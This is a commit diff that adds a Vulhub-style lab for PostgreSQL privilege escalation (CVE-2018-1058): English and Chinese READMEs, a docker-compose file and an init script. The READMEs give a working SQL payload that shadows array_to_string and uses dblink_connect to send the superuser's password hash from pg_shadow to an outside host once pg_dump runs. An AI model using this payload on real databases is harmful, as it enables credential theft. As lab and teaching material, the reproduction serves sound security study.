first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled

This commit is contained in:
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 10 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 3.1 KiB

View File

@@ -0,0 +1,53 @@
# PostgreSQL Privilege Escalation (CVE-2018-1058)
[中文文档](README.zh-cn.md)
PostgreSQL is a powerful open-source relational database system. A logical error exists in versions 9.3 through 10, where superusers can unknowingly execute malicious code created by regular users, leading to unexpected operations.
References:
- https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058:_Protect_Your_Search_Path
- https://xianzhi.aliyun.com/forum/topic/2109
## Environment Setup
Execute the following command to start a vulnerable PostgreSQL server:
```
docker compose up -d
```
The server will start and listen on the default PostgreSQL port 5432.
## Vulnerability Reproduction
Following the second exploitation method from the references, we'll first connect to PostgreSQL as the regular user `vulhub:vulhub`:
```bash
psql --host your-ip --username vulhub
```
![](1.png)
Execute the following SQL statements and then exit:
```sql
CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')));
SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;
```
Now, set up a listener on port 5433 at `10.0.0.1` to wait for the superuser to trigger our "backdoor".
(Simulating superuser actions) On the target machine, execute the `pg_dump` command as the superuser:
```bash
docker compose exec postgres pg_dump -U postgres -f evil.bak vulhub
```
This command will export the contents of the `vulhub` database. When executed, our "backdoor" is triggered, and sensitive information is received on the `10.0.0.1` machine:
![](2.png)
This is just one of several exploitation methods for this vulnerability. For more exploitation techniques, please refer to the articles in the References section.

View File

@@ -0,0 +1,51 @@
# PostgreSQL 提权漏洞CVE-2018-1058
PostgreSQL 是一个功能强大的开源关系型数据库系统。在9.3到10版本中存在一个逻辑错误导致超级用户在不知情的情况下可能执行普通用户创建的恶意代码从而造成意外的操作。
参考链接:
- https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058:_Protect_Your_Search_Path
- https://xianzhi.aliyun.com/forum/topic/2109
## 环境搭建
执行以下命令启动存在漏洞的PostgreSQL服务器
```
docker compose up -d
```
服务器将在默认的PostgreSQL端口5432上启动并监听。
## 漏洞复现
参考上述链接中的第二种利用方式,我们首先以普通用户`vulhub:vulhub`的身份连接PostgreSQL
```bash
psql --host your-ip --username vulhub
```
![](1.png)
执行以下SQL语句后退出
```sql
CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres')));
SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;
```
现在,在`10.0.0.1`机器上监听5433端口等待超级用户触发我们的"后门"。
(模拟超级用户操作)在目标机器上,以超级用户身份执行`pg_dump`命令:
```bash
docker compose exec postgres pg_dump -U postgres -f evil.bak vulhub
```
此命令将导出`vulhub`数据库的内容。当命令执行时,我们的"后门"被触发,`10.0.0.1`机器上收到敏感信息:
![](2.png)
这仅仅是该漏洞的几种利用方法之一。要了解更多利用技术,请参考参考链接中的文章。

View File

@@ -0,0 +1,10 @@
version: '2'
services:
postgres:
image: vulhub/postgres:9.6.7
ports:
- "5432:5432"
environment:
- POSTGRES_PASSWORD=vulhub_secret
volumes:
- ./init.sh:/docker-entrypoint-initdb.d/init.sh

View File

@@ -0,0 +1,13 @@
#!/bin/bash
set -ex
psql -v ON_ERROR_STOP=1 --username "$POSTGRES_USER" <<-EOSQL
CREATE USER "vulhub" WITH PASSWORD 'vulhub';
CREATE DATABASE "vulhub" OWNER "vulhub";
GRANT ALL PRIVILEGES ON DATABASE "vulhub" to "vulhub";
EOSQL
psql -v ON_ERROR_STOP=1 --username "$POSTGRES_USER" vulhub <<-EOSQL
CREATE EXTENSION IF NOT EXISTS dblink;
EOSQL